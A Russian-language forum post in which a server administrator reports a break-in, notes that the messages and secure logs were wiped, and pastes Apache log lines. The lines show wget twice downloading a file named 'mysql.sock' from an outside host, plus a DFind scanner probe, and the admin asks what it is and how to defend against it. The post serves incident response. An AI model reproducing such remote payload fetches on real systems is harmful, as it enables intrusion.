логи messages и secure стерли
Взлом предположительно произошел сегодня в ~11 часов
в логах HTTP есть такое
-------------------------------------------------------------
[Thu Aug 26 03:50:16 2010] [error] [client 109.87.71.111] Attempt to serve directory: /var/www/html/
--11:09:12-- http://lipozor.go.ro/mysql.sock
Resolving lipozor.go.ro... [Thu Aug 26 11:09:13 2010] [error] [client 62.103.39.74] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
81.196.20.134
Connecting to lipozor.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29674 (29K) [text/plain]
Saving to: `mysql.sock'
0K .......... .......... ........ 100% 176K=0.2s
11:09:13 (176 KB/s) - `mysql.sock' saved [29674/29674]
--11:13:07-- http://lipozor.go.ro/mysql.sock
Resolving lipozor.go.ro... 81.196.20.134
Connecting to lipozor.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29674 (29K) [text/plain]
Saving to: `mysql.sock.1'
0K .......... .......... ........ 100% 174K=0.2s
11:13:08 (174 KB/s) - `mysql.sock.1' saved [29674/29674]
-------------------------------------------------------------
Подскажите, что это и как от этого защищаться?
Похожие темы
- Форум Половина сайтов не открываются через VPN, хотя на самом сервере - ОК (2014)
- Форум Взлом через Апач - как? что делать? (2005)
- Форум Провайдер начал блокировать техничискую документация (2016)
- Форум Помогите разобраться с apache в freebsd (2008)
- Форум зависает wget (2007)
- Форум Как скачать большой файл (2007)
- Форум настройка ntlmaps/прокси(проблема с редиректом) (2011)
- Форум Выполнение скрипта (2014)
- Форум Провайдер блокирует загрузку больших файлов (2018)
- Форум А у нас такое есть ? (2005)